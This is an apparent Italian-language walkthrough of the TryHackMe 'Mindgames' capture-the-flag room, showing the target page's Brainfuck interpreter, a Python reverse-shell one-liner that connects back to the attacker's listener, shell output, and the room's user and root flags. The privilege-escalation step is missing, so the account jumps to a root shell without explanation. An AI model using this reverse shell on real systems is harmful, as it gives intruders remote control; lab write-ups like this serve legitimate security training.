- Modificato
Descrizione:
Solo una pessima idea...
Nessun avviso. Attaccalo. Non mollare se rimani bloccato, enumera di più
Link: https://tryhackme.com/room/mindgames
Iniziamo enumerando i servizi con Nmap:
user㉿parrot:/data/Mindgames$ curl -s http://10.10.211.54 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Mindgames.</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" media="screen" href="/main.css"> <script src="/main.js"></script> </head> <body onload="onLoad()"> <h1>Sometimes, people have bad ideas.</h1> <h1>Sometimes those bad ideas get turned into a CTF box.</h1> <h1>I'm so sorry.</h1> <!-- That's a lie, I enjoyed making this. --> <p>Ever thought that programming was a little too easy? Well, I have just the product for you. Look at the example code below, then give it a go yourself!</p> <p>Like it? Purchase a license today for the low, low price of 0.009BTC/yr!</p> <h2>Hello, World</h2> <pre><code>+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------.++[->++<]>.-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------.---[->+++<]>.-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++.>++++++++++.</code></pre> <h2>Fibonacci</h2> <pre><code>--[----->+<]>--.+.+.[--->+<]>--.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.++[++>---<]>+.-[-->+++<]>--.>++++++++++.[->+++<]>++....-[--->++<]>-.---.[--->+<]>--.+[----->+<]>+.-[->+++++<]>-.--[->++<]>.+.+[-->+<]>+.[-->+++<]>+.+++++++++.>++++++++++.[->+++<]>++........---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.[-->+++<]>+.>++++++++++.[->+++<]>++....---[----->++<]>.-------------.[--->+<]>---.+.---.----.-[->+++++<]>-.+++[->++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.++++.--------.++.-[--->+++++<]>.[-->+<]>+++++.[--->++<]>--.[----->++<]>+.+++++.---------.>++++++++++...[--->+++++<]>.+++++++++.+++.[-->+++++<]>+++.-[--->++<]>-.[--->+<]>---.-[--->++<]>-.+++++.-[->+++++<]>-.---[----->++<]>.+++[->+++<]>++.+++++++++++++.-------.--.--[->+++<]>-.+++++++++.-.-------.-[-->+++<]>--.>++++++++++.[->+++<]>++....[-->+++++++<]>.++.---------.+++++.++++++.+[--->+<]>+.-----[->++<]>.[-->+<]>+++++.-----[->+++<]>.[----->++<]>-..>++++++++++.</code></pre> <h2>Try before you buy.</h2> <form id="codeForm"> <textarea id="code" placeholder="Enter your code here..."></textarea><br> <button>Run it!</button> </form> <p></p> <label for="outputBox">Program Output:</label> <pre id="outputBox"></pre> </body> </html>
Intercettare le richieste con Burp Suite rivelerà che il form invia l'input del form alla posizione /api/bf, in modo asincrono, grazie a javascript (main.js):
async function postData(url = "", data = "") { // Default options are marked with * const response = await fetch(url, { method: 'POST', // *GET, POST, PUT, DELETE, etc. cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached credentials: 'same-origin', // include, *same-origin, omit headers: { 'Content-Type': 'text/plain' }, redirect: 'follow', // manual, *follow, error referrerPolicy: 'no-referrer', // no-referrer, *client body: data // body data type must match "Content-Type" header }); return response; // We don't always want JSON back } function onLoad() { document.querySelector("#codeForm").addEventListener("submit", function (event) { event.preventDefault() runCode() }); } async function runCode() { const programBox = document.querySelector("#code") const outBox = document.querySelector("#outputBox") outBox.textContent = await (await postData("/api/bf", programBox.value)).text()
Reverse shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); user㉿parrot:/data/Mindgames$ rlwrap nc -nlvp 4444 listening on [any] 4444 ... connect to [10.8.50.72] from (UNKNOWN) [10.10.211.54] 38032 bash: cannot set terminal process group (677): Inappropriate ioctl for device bash: no job control in this shell mindgames@mindgames:~/webserver$ id id uid=1001(mindgames) gid=1001(mindgames) groups=1001(mindgames) mindgames@mindgames:~/webserver$
USER FLAG:
mindgames@mindgames:~/webserver$ cd /home cd /home mindgames@mindgames:/home$ ls -l ls -l total 8 drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 mindgames drwxr-x--- 5 tryhackme tryhackme 4096 May 11 15:25 tryhackme mindgames@mindgames:/home$ cd mindgames cd mindgames mindgames@mindgames:~$ ls -la ls -la total 40 drwxr-xr-x 6 mindgames mindgames 4096 May 11 15:36 . drwxr-xr-x 4 root root 4096 May 11 13:48 .. lrwxrwxrwx 1 mindgames mindgames 9 May 11 15:25 .bash_history -> /dev/null -rw-r--r-- 1 mindgames mindgames 220 May 11 13:48 .bash_logout -rw-r--r-- 1 mindgames mindgames 3771 May 11 13:48 .bashrc drwx------ 2 mindgames mindgames 4096 May 11 14:07 .cache drwx------ 3 mindgames mindgames 4096 May 11 14:07 .gnupg drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:24 .local -rw-r--r-- 1 mindgames mindgames 807 May 11 13:48 .profile -rw-rw-r-- 1 mindgames mindgames 38 May 11 15:24 user.txt drwxrwxr-x 3 mindgames mindgames 4096 May 11 15:36 webserver mindgames@mindgames:~$ cat user.txt cat user.txt thm{411f7d38247ff441ce4e134b459b6268}
ROOT FLAG:
mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ cat server.service [Unit] Description=Production Web Server [Service] User=mindgames Group=mindgames WorkingDirectory=/home/mindgames/webserver ExecStart=/home/mindgames/webserver/server -p 80 Restart=always RestartSec=5 [Install] WantedBy=multi-user.target mindgames@mindgames:/etc/systemd/system/multi-user.target.wants$ ls -la server.service lrwxrwxrwx 1 root root 34 May 11 15:33 server.service -> /etc/systemd/system/server.service
Infine:
root@mindgames:~# cat /root/root.txt
thm{1974a617cc84c5b51411c283544ee254}
RICAPITOLANDO:
User flag.
thm{411f7d38247ff441ce4e134b459b6268}
Root flag.
thm{1974a617cc84c5b51411c283544ee254}